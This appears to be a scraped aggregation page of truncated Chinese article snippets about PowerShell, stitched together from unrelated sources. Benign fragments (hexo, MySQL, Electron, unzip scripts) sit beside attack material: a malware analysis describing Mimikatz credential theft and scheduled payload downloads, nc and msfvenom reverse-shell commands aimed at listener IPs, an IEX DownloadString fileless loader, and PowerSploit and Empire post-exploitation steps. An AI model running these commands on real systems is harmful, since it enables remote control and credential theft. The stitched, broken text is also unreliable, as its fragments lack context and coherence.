攻击特征 1.病毒会创建计划任务持续使用PowerShell.exe下载其他恶意程序。 2.病毒运行挖矿程序占用计算机资源,影响正常使用。 3.病毒运行木马程序用于自身持久化驻留和操控计算机。...运行程序,此程序会调用Mimikatz脚本,进行本机用户和密码的抓取, 同时创建计划任务,每天固定时间点自动向XX.beahh.com发送http请求下载域名解析后服务器上的程序,并以HTA(内含微软某...该木马会发送基于445端口的SMB数据包,同时具有扫描内网和外网开放445端口的ip,即便已安装永恒之蓝的补丁,也无法遏制内网传播,一旦开启了SMB服务则有可能会中毒,该木马是利用445端口进行SMB域账户爆破...病毒拥有远控功能,运行后将本机的CUP型号,操作系统版本,MAC地址,ip地址,域用户名,显卡信息,挖矿线程,以及计算机参数传递给终端: 该脚本新增一个计划任务,计划每天7:00运行 C:\windows...进程操作 执行cmd命令查询域名信息、本地管理员组信息: ? 判断当前环境是否在域中,由于测试机未加入域,此操作失败。 ? 释放PowerShell脚本并执行,命令行参数为 ?
Windows PowerShell运行hexo命令 前言 一个月前更新了Windows11,在桌面右键可以直接开启 Windows PowerShell 便在安装 git 时没有选择在右键快捷打开的配置...,便有了这篇水文 在新系统上装了hexo环境,可打开系统默认的 Windows PowerShell 运行命令却无法识别,以为是系统环境变量没设置好。...可在 Git bash 和 CMD 终端却可以执行,再仔细看 Windows PowerShell 中的提示,原来是提示的无法加载文件,因此在此系统上禁止运行脚本。...错误示例 安装好 npm 和 hexo 后,在 Windows PowerShell 终端运行 npm version 没问题,运行 hexo version 则提示如下: hexo : 无法加载文件...所在位置 行:1 字符: 1 此时,在 CMD 中执行以上命令都没问题,所以不是系统环境变量的问题。
我们在分别在内网与公网服务器执行以西命令: nc -t -e cmd.exe 192.168.205.1 8888 //在内网服务器上面执行此命令,将在公网服务器开启一个cmd的窗口; nc -lvp...为了方便测试,内网主机我们用kali,因为kali上面不用安装,需要在公网IP安装一下。...首先使用bash反弹生成一句话,执行一下命令:msfvenom -p cmd/unix/reverse_bash lhost=MSFIP lport=5555 R 这条命令也可以在自己kaili上面执行生成...msfvenom -p cmd/windows/reverse_powershell lhost=106.xxx.xxx.115 lport=8899 r //生成payload,类型是Powershell...由于执行的命令太多了,小白在这里就不罗列了,还是那句话,首先在公网服务器上执行监听的命令: nc -lvvp 8899 //监听本机的8899端口 下面我们在内网服务器上面执行Powershell命令
因为windows内置了zip格式文件的解压缩,所以powershell中可以直接调用powershell的函数就能实现zip解压缩....7z和HaoZip(好压)都提供了命令行解压缩工具,所以可以利用7z或HaoZip来实现 利用7z和HaoZip(好压)实现命令行解压的powershell实现代码如下: unpack.ps1...[string]$package, [string]$targetFolder, [switch]$quiet, [switch]$help ) # 上一条命令执行出错则中止脚本执行,并输出调用堆栈信息...if($index -lt 0){ # 没有文件后缀,无法识别,报错退出 echo "unkonw file fomat $package" exit -...,命令行版本则是 HaoZipC.exe # 如果不设置此值,脚本会通过 assoc,ftype命令查找,但有可能查找不到 #$UNPACK_TOOL="C:\Program Files\7-Zip\7z.exe
1、手动收集信息 本机信息包括主机的系统、权限、内网分配P地址段、安装的软件杀毒、端口、服务、补丁更新频率、网络连接信息、共享、会话等。如果是域内主机,系统、软件、补丁、服务、杀毒一般都是批量安装的。...安装软件版本信息 使用wmic命令,可以将结果输出到文本中,具体如下,如下图所示: wmic product get name,version ?...同时,也可以使用wmic来识别安装在系统中的补丁情况,命令如下图所示: wmic qfe get Caption,Description,HotFixID,InstalledOn ?...在扫描的时候,应尽量避免使用Namp等工具进行暴力扫描,也不要在目标机器上使用图形化的工具,而要尽量使用目标系统自带的各种工具,推荐使用PowerShell脚本。...cmd.exe的加强版。
交互式脚本环境 PowerShell 将交互式环境和脚本环境组合在一起,从而允许访问命令行工具和 COM 对象,同时还可利用 .NET Framework 类库 (FCL) 的强大功能(可以加载调用cmd...可以创建在 Cmd.exe 中运行的外部命令行工具,但这些外部工具不能提供服务(例如帮助集成),而且 Cmd.exe 不能自动识别它们是否是有效的命令。...PowerShell 中的本机二进制命令cmdlet可以通过创建并使用管理单元添加到 Windows PowerShell 中的 cmdlet 进行补充。...可以使用它们将 Windows PowerShell 提供程序以及新的 cmdlet 添加到 shell 中。最重要的是,Powershell能够识别这些新添加的命令是否是有效的命令。...了解命令名称及命令参数需要花费大量的时间。 使用新命令或参数时,通常无法使用已知的名称,而必须查找和了解新的名称。
常见的优点包括: Windows 7以上的操作系统默认安装 PowerShell脚本可以运行在内存中,不需要写入磁盘 可以从另一个系统中下载PowerShell脚本并执行 目前很多工具都是基于PowerShell...在PowerShell脚本无法执行时,可以使用下面的 Get-ExecutionPolicy 命令确定当前的执行策略。...传统的Cmd管道是基于文本的,但是Powershell管道是基于对象。例如: linux:ls cmd:dir 如果只获取其中的name、mode值,则使用如下指令。...NoProfile(-NoP):PowerShell控制台不加载当前用户的配置文件 Noexit:执行后不退出Shell,这在使用键盘记录等脚本时非常重要 再次强调,PowerShell脚本在默认情况下无法直接执行...4.PowerShell远程下载文件并执行 5.PowerShell渗透测试常用命令 6.PowerShell导入文件 二.PowerSploit攻击详解 1.PowerSploit安装 2.MSF反弹
(无文件攻击),也可以把PowerShell看作命令行提示符cmd.exe的扩充。...常见的优点包括: Windows 7以上的操作系统默认安装 PowerShell脚本可以运行在内存中,不需要写入磁盘 可以从另一个系统中下载PowerShell脚本并执行 目前很多工具都是基于PowerShell...在PowerShell脚本无法执行时,可以使用下面的 Get-ExecutionPolicy 命令确定当前的执行策略。...传统的Cmd管道是基于文本的,但是Powershell管道是基于对象。例如: linux:ls cmd:dir 如果只获取其中的name、mode值,则使用如下指令。...NoProfile(-NoP):PowerShell控制台不加载当前用户的配置文件 Noexit:执行后不退出Shell,这在使用键盘记录等脚本时非常重要 再次强调,PowerShell脚本在默认情况下无法直接执行
nicconfig get ipaddress,macaddress #查看系统中⽹卡的IP地址和MAC地址 wmic qfe get description,installedOn #使⽤wmic识别安装到系统中的补丁情况...wmic调用cmd 注意:以下命令需要管理员权限。...作为载荷 在客户机上执行wmic命令,让指定机器上线CS · XSL 如下为普通的xsl恶意文件,我们可以在下例中修改Run()中的Payload,本地运行恶意程序或者远程使用Powershell...WMIcmd.exe在域内使用 pth-wmic 注意:此为kali内置工具,只能执行一些WMI命令,无法执行其他命令....命令,成功创建运行cmd.exe,进程号为3192 3192进程对应的cmd.exe Invoke-WmiCommand 注意:Invoke-WmiCommand.ps1为PowerSploit内置利用脚本
脚本的使用 ?...PowerSploit是一款基于PowerShell的后渗透框架软件,包含了很多PowerShell的攻击脚本,它们主要用于渗透中的信息侦测,权限提升、权限维持等。...我们先下载PowerView.ps1脚本到本地,然后在当前目录下打开cmd,执行以下命令执行PowerView.ps1脚本中的Get-NetDomain模块,如果要执行该脚本的其他模块,亦是如此 powershell...使用:Test-ServiceDaclPermission -servicename 服务名 Write-UserAddMSI 该模块写入一个MSI安装程序,提示要添加一个用户...Invoke-NinjaCopy.ps1脚本的使用 该脚本在Exfiltration目录下,该文件的作用是复制一些系统无法复制的文件,比如sam文件。
2.2 Empire工具安装 在实验虚拟linux系统中安装 git clone https://github.com/EmpireProject/Empire.git #进入setup目录进行命令行安装...(3) 测试SSH登录是否成功 查看本机IP(linux命令:ifconfig),如在windows下的XShell工具下输入Server IP 输入登录名和密码,成功登入系统则SSH Server端搭建成功...3.2 使用Empire工具生成PowerShell脚本备用 Empire工具类似Metasploit,详细使用教程可参考一篇文章精通PowerShell Empire。...本次实验使用Empire生成简单的PowerShell脚本,建立最简单的C&C通信。下面简单概括主要步骤。...(4) 使用(2)中生成的PowerShell脚本,使受控主机上线 a) windows 7虚拟机另外开启一个CMD窗口,复制PowerShell脚本执行。可以看到受控主机以上线。 ?
前几天看了一个文章《全球上百家银行和金融机构感染了一种“无文件”恶意程序,几乎无法检测》,觉得powershell很是神奇,自己希望亲手实验一下,以最大程度还原“无文件”攻击方式。...包括了下载和执行、键盘记录、dns、延时命令等脚本 2、PowerSploit是又一款Post Exploitation 相关工具,Post Exploitation是老外渗透测试标准里面的东西,就是获取...PowerSploit 其实就是一些powershell脚本,包括Inject-Dll(注入dll 到指定进程 )、Inject-Shellcode(注入shellcode到执行进程)、 Encrypt...后来经过我不断的尝试,执行cmd的时候就可以把shell的权限提了,很不错,但是如果你执行powershell这个指令的话,那么这个反弹的shell就会假死) 这个时候在本机搜集一下信息: 首先用mimikatz...使用方法还是先把脚本下载到黑客自己的web目录下,我为了方便,我写了一个调用脚本放在web目录下(1.ps1) IEX(New-ObjectNet.WebClient).DownloadString('
为了验证这一论点,我们进行如下的一个测试,来分别打印本地机器安装的node的版本和electon内部的node版本: 图片 接下来是electron主进程脚本的node版本显示(main.js):...实际上,install-app-deps内部依然使用了node-gyp相关知识,关于这一块的知识,读者可以翻阅我之前的文章《node-pre-gyp以及node-gyp的源码简单解析(以安装sqlite3...然后在package.json中的scripts中添加一段脚本:"installappdeps": "electron-builder install-app-deps" 最后调用命令npm rum installappdeps...cmd(Windows CMD) On Windows the environment variable is set using the set command: 在Windows CMD设置环境变量可以使用如下命令...,无法被electron-builder识别,。
环境说明: 系统:win10专业版 mysql 5.7 问题如图: win10在使用mysql命令登录数据库时,出现报错信息: 解决办法: 第一步、以管理员权限运行powershell 第二步...、进入Mysql安装目录的bin文件夹 第三步、输入命令: ....\mysqld.exe install 第四步、以后使用时进入mysql安装目录下的bin文件夹下,用.\mysql命令代替mysql命令即可 登录数据库: .
Powershell的快捷键和cmd以及linux中的shell 都比较像。...启动PowerShell非常简单直接在CMD命令行之中: PowerShell PowerShell_ISE TIPS:默认键入一个字符串PS会将它原样输出,如果该字符串是一个命令或者启动程序...描述:若要下载并安装包含此 cmdlet 的模块的帮助文件,请使用 Update-Help。...Get-Alias 获取别名 描述:Get-Alias cmdlet 显示与别名关联的本机 PowerShell 命令的真实名称。...,无法写入。
,由.NET Framework和.NET Core构建的命令行界面壳层相关脚本语言组成,最初仅仅是Windows组件,后于2016年8月18日开源并跨平台支持。...PowerShell的特性很多,比如: 一致性的设计让所有工具和系统资料的使用语法、命名原则都相同。 脚本语言简单易学,且支持现有的脚本程序和命令行工具。...PowerShell Core 可以自动检测适合的编码,自动识别 Linux 和 Windows 下的换行符,跨平台。 但是,我感受最深的,就说支持一些GNU和Unix的命令,比如:cd、cat等等。...“白话文”版本 说白了,一般情况下,你完全可以吧PowerShell当作“大号”的CMD(命令提示符),在继承原有命令的同时,支持OpenSSL、OpenSSH等工具函数,比如:支持使用SSH连接Linux...调用PowerShell 安装好,或者说直接打开Windows Terminal,默认就是PowerShell界面啦: image.png 调用CMD 同样,Windows Terminal支持调用CMD
脚本的使用 PowerSploit PowerSploit是一款基于PowerShell的后渗透框架软件,包含了很多PowerShell的攻击脚本,它们主要用于渗透中的信息侦测,权限提升、权限维持等。...我们先下载PowerView.ps1脚本到本地,然后在当前目录下打开cmd,执行以下命令执行PowerView.ps1脚本中的Get-NetDomain模块,如果要执行该脚本的其他模块,亦是如此 powershell...\powerview.ps1;Get-NetDomain 如果需要远程加载模块的话,我们先将PowerView.ps1放到我们的http服务目录下,然后执行以下命令 powershell -exec...使用:Test-ServiceDaclPermission -servicename 服务名 Write-UserAddMSI 该模块写入一个MSI安装程序,提示要添加一个用户...Invoke-NinjaCopy.ps1脚本的使用 该脚本在Exfiltration目录下,该文件的作用是复制一些系统无法复制的文件,比如sam文件。
/RebootToComplete 注意: (1)必须确保机器可以正常连接windows更新服务器或自定义的相关更新服务器,否则无法实现更新 (2)该脚本执行结束后,机器会重启以保证补丁生效 (3)...脚本执行时间取决于补丁大小及网络状况等 另外,了解下使用 WUA 脱机扫描更新 需要提醒的是,不通过winrm,直接在系统里执行cscript.exe "C:\windows_update.vbs"没问题...$null winrm set winrm/config/client '@{TrustedHosts="*"}' 2>&1 > $null #netstat -ato|findstr :5985 用powershell...,只是执行到Downloading那里报错了 winrm跟系统内部cmd/powershell还是有区别的,有些命令通过winrm并不能达到系统内部cmd/powershell执行命令的效果 我调整思路...cscript.exe 'C:\windows_update.vbs'" /f; schtasks /Run /TN "update"; 通过先创建一个计划任务再触发计划任务执行,这样就相当于在远程服务器本机执行命令
2.安装Python后不能识别,powershell显示无法找到Python。...详见百度百科或者维基百科 Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework 的强大功能。...它引入了许多非常有用的新概念,从而进一步扩展了您在 Windows 命令提示符和 Windows Script Host 环境中获得的知识和创建的脚本。 它是cmd的豪华升级版。...Shell: 在计算机科学中,Shell俗称壳(用来区别于核),是指“提供使用者使用界面”的软件(命令解析器)。它类似于DOS下的command和后来的cmd.exe。...(MS-DOS系统) cmd.exe/ 命令提示字符(Windows NT 系统) Windows PowerShell(支援 .NET Framework 技术的 Windows NT 系统)
Powershell是基于.net框架上面向对象的,本身内部就内置了很多的命令,而CMD写的脚本是面向过程的编程,本身没有集成太多的功能,大部分都是依赖第三方的程序。...#cmd所有的windows系统中都带有cmd,但是powershell就低版本的系统中就没有了,需要自己安装才可以。...通过PowerShell编写完xxx.ps1的脚本文件后,就可以通过FTViewSE中命令向导中选择ScriptExecute去执行在FTVIEWSE中脚本选项中保存的脚本即可执行这个脚本。...如上图所示,不过经过测试发现我编写的.ps1脚本虽然提示执行成功了,但是结果没有达到预期的效果,会提示模式不支持,然后无法设置电脑相关属性。...具体的使用方法也比较的简单容易啊,基本上就是根据提示下一步下一步的点然后输入一些信息就可以了,然后到了install program这里选择install program时选择使用cmd.exe然后来打开之前创建的
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
即时通信 IM
ICP备案
对象存储
实时音视频
